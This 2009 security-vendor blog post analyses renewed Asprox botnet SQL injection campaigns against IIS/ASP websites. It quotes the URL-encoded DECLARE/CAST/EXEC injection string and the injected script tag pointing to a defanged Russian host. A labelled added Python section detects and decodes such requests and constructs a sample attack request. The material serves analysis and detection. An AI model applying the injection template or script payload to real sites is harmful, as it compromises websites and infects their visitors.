Asprox, the return
November 6, 2009 at 10:00 am
Do you remember Asprox, the botnet that used SQL injection attacks combined with results from search engines like Google to automatically infect Microsoft IIS-powered websites? We gave a talk (slides) about it at the last Virus Bulletin conference, and for about a month now we have been seeing new variants in the wild.
Like last December, a blind SQL injection targeting ASP pages backed by Transact-SQL is attempted, using the following string as a request argument:
DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C41524520405420564…%20AS%20VARCHAR(4000));EXEC(@S)
Once decoded, it turns out this code tries to inject malicious JavaScript into the database contents, so nothing new here; the sample we have seen injected:
<script src=hxxp://www.bannerdriven.ru/ads.js></script>
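As an added example (not code from the post or from Fortinet), here is a small Python decoder written from the detection side: it recognises the DECLARE / SET @S=CAST(0x... AS VARCHAR) / EXEC(@S) shape in a URL-encoded request, decodes the hex literal, and lists the external script references hidden inside it. The request and the inner statement are constructed for the example; applied to the hex fragment quoted above, the same decoder yields `DECLARE @T V`, the start of the hidden statement.

```python
import re
from urllib.parse import unquote

# Shape of the Asprox request argument quoted in the post:
#   DECLARE @S VARCHAR(4000);SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S)
# The back-reference \1 ties DECLARE, SET and EXEC to the same variable name.
PAYLOAD_RE = re.compile(
    r"DECLARE\s+@(\w+)\s+N?VARCHAR\s*\(\s*\d+\s*\)\s*;"
    r"\s*SET\s+@\1\s*=\s*CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR\s*\(\s*\d+\s*\)\s*\)\s*;"
    r"\s*EXEC\s*\(\s*@\1\s*\)",
    re.IGNORECASE,
)

def decode_hex_literal(hex_digits):
    """Turn the 0x... literal back into the T-SQL it hides; a truncated literal loses its dangling nibble."""
    if len(hex_digits) % 2:
        hex_digits = hex_digits[:-1]
    return bytes.fromhex(hex_digits).decode("latin-1")

def inspect_request(raw_request):
    """Return details of the hidden statement if the request carries this payload shape, else None."""
    decoded = unquote(unquote(raw_request))  # survive single- and double-URL-encoded parameters
    match = PAYLOAD_RE.search(decoded)
    if match is None:
        return None
    variable, hex_digits = match.groups()
    inner_sql = decode_hex_literal(hex_digits)
    return {
        "variable": variable,
        "inner_sql": inner_sql,
        # external script references the hidden statement would write into the database
        "script_refs": re.findall(r"""src=([^\s>'"]+)""", inner_sql, re.IGNORECASE),
    }

# Constructed sample (not a capture): the inner statement is hex-encoded here the same way
# the real requests encode theirs, so the decoder can be exercised end to end.
INNER_SQL = "DECLARE @T VARCHAR(255);SET @T='<script src=hxxp://www.bannerdriven.ru/ads.js></script>';SELECT @T"
SAMPLE_REQUEST = (
    "GET /catalog.asp?id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + INNER_SQL.encode("ascii").hex().upper()
    + "%20AS%20VARCHAR(4000));EXEC(@S) HTTP/1.1"
)
BENIGN_REQUEST = "GET /catalog.asp?id=42 HTTP/1.1"

if __name__ == "__main__":
    print(inspect_request(SAMPLE_REQUEST))
    print(inspect_request(BENIGN_REQUEST))
```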
As the injected string is concatenated with the HTML <title> tag, it is easy to use Google to find more victims; hundreds of websites have already been compromised. From what we saw, the goal of the injected JavaScript is to silently redirect users to malicious servers located in Russia. Here is a non-exhaustive list:
These sites are set up to trap victims using drive-by-download attacks. The web exploit toolkit powering those attacks was updated to also target the latest vulnerabilities in Adobe Flash (SWF files) and Adobe Reader (PDF files).
The injection vector is still the same as last year (vulnerable server-side scripts); however, judging from the results we can see, there are still many web applications vulnerable to SQL injection attacks (and I believe this is a never-ending battle). So why should the attackers look for another attack vector? Besides, the web exploit toolkit update ensures a steady rate of newly infected machines and constant growth of their botnet.
At the VB conference, during the Q&A session of our talk, a cunning attendee suggested that the positive side of last year's ubiquitous botnet-powered SQL injection campaigns was that, at least, it served as a giant pen-test for the Web. Unfortunately, it seems that the pen-test aftermath, as alarming as it was, did not suffice to raise the awareness of webmasters to a point where cybercriminals would stop having an endless supply of machines ready to be infected.
Did you update your third-party software recently?
Fortinet customers are protected by FortiGuard IPS, which detects malicious SQL queries in HTTP requests.